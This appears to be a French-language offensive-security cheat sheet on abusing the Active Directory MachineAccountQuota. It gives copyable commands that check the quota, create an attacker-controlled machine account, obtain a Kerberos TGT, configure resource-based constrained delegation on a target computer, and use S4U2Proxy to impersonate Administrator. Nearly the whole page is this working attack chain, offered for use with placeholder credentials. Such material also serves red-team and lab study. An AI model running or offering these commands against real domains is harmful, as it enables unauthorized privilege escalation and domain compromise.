Information Gathering

Machine Account Quota Abuse

Créer un compte machine pour préparer RBCD, Kerberos attacks ou d'autres abus.

Copy command
nxc ldap $DC -u $USER -p $PASS -M maq

Description: Vérifier le MachineAccountQuota : nombre de comptes machine créables par utilisateur.

Copy command
addcomputer.py -computer-name 'ATTACKER$' -computer-pass 'Attacker123!' -dc-ip $DC $DOMAIN/$USER:$PASS

Description: Créer un compte machine contrôlé par l'attaquant si MAQ > 0.

Copy command
getTGT.py $DOMAIN/'ATTACKER$':Attacker123!

Description: Obtenir un TGT pour le compte machine : prêt pour RBCD ou AS-REP.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add rbcd '$TARGET_COMPUTER$' 'ATTACKER$'

Description: Configurer RBCD sur la cible en utilisant notre compte machine comme délégant.

Copy command
getST.py -spn cifs/$TARGET.$DOMAIN -impersonate Administrator -dc-ip $DC $DOMAIN/'ATTACKER$':Attacker123!

Description: S4U2Proxy depuis le compte machine : impersonner Administrator via RBCD.